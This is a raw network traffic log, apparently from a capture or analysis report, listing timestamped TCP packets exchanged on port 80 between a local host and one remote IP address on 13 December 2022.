                                              Dec 13, 2022 20:09:17.896333933 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.896424055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.896514893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.896601915 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.896692038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.896784067 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.896871090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.896969080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.897063017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.897151947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.897241116 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.897327900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.897416115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.897525072 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.897597075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.897686005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.899676085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.899861097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.899988890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.900074959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.900173903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.900263071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.900357962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.900449038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.900542021 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.900633097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.905165911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.905277967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.905373096 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.905486107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.905565977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.905658007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.905746937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.905832052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.905925035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.910368919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.910558939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.910666943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.910759926 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.910856009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.910948038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.911042929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.911128044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.911257982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.911313057 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.911410093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.911498070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.911628962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.911720991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.911809921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.911895990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.911994934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.912081003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.912177086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.912262917 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.912359953 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.912450075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.912548065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.912636042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.912733078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.912826061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.912921906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.913008928 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.913103104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.913192034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.913285971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.916111946 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.916136026 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.916152954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.916171074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.916189909 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.916307926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.916327000 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.916344881 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.916361094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.916764975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.916790962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.916848898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.917118073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.917140961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.917164087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.917294979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.917387962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.918636084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.918766975 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.918862104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.918961048 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.919038057 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.919126034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.919213057 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.919307947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.919389009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.919475079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.919564009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.919650078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.919738054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.924927950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.924927950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.925015926 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.925103903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.925241947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.925287962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.925368071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.925484896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.925554037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.925638914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.925723076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.925813913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.925909042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.926026106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.926171064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.926279068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.926368952 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.926470995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.926562071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.926662922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.926750898 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.926848888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.926949978 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.927045107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.927143097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.927241087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.927331924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.927433968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.927525997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.927628040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.927717924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.927818060 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.927907944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.928008080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.928097963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.928203106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.928292990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.928390980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.928482056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.928586006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.928675890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.928771019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.928862095 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.928960085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.930114985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.930202961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.930289030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.930388927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.930475950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.930569887 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.930659056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.930751085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.937139034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.937721968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.937803030 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.938097000 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.938410997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.938638926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.938971043 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.939443111 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.939523935 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.939863920 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.939904928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.940373898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.940677881 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.940938950 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.941287994 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.941487074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.941684961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.942063093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.942265034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.943320990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.943357944 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.943497896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.943609953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.943847895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.944160938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.944356918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.944679022 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.944915056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.945199013 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.945346117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.945385933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.945521116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.945595980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.945804119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.945827961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.945964098 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.946074963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.946199894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.946357012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.946381092 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.946535110 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.946635962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.946715117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.946825981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.946954012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.947096109 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.947129965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.947267056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.947416067 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.947504997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.947675943 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.947743893 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.954993010 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.955147028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.955166101 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.955615044 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.955734015 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.955770016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.955785036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.956041098 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.956054926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.956413031 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.956433058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.956448078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.956464052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.956556082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.956571102 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.956979036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.957030058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.957607031 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.957680941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.957698107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.958187103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.958204985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.958642960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.960417986 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.960901976 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.960925102 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.961096048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.961116076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.961133003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.965825081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.965851068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.965867996 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.965903997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.966178894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.966203928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.966222048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.966319084 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.966396093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.971205950 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.971250057 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.971282959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.971327066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.971371889 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.971427917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.971520901 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.971642017 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.971756935 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.971849918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.971916914 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.971952915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.972198009 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.972290993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.972322941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.972439051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.972675085 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.972713947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.972745895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.972779036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.972810984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.972970963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.973010063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.973119020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.973278999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.973365068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.973412991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.973495960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.973637104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.973670959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.973726988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.979321003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.979368925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.979451895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.979506969 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.979589939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.979667902 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.979774952 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.979877949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.979911089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.979989052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.980132103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.980189085 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.985718966 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.985747099 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.985804081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.985836029 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.985893965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.986046076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.986068964 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.986090899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.986201048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.986310005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.986362934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.986562967 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.986759901 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.986977100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.987003088 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.987081051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.987117052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.987159967 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.987205982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.987366915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.987442017 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.987579107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.987601995 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.987721920 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.987886906 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.987909079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.987957001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.988121986 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.988194942 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.988318920 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.988395929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.988481045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.988559008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.988672018 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.988831997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.988858938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.988917112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.989058018 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.989166975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.989304066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.989550114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.990633965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.990681887 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.990700960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.990900993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.991009951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.991242886 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.991297960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.991317034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.998713017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.998904943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.999237061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.999353886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.999471903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.999627113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.999742031 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.999841928 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.999952078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.000053883 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.000164986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.000336885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.000368118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.000471115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.000576019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.000680923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.000786066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.000885010 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.000992060 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.001091957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.001199007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.001297951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.001405001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.001529932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.001616001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.001714945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.001826048 CET4973680192.168.2.362.204.41.79
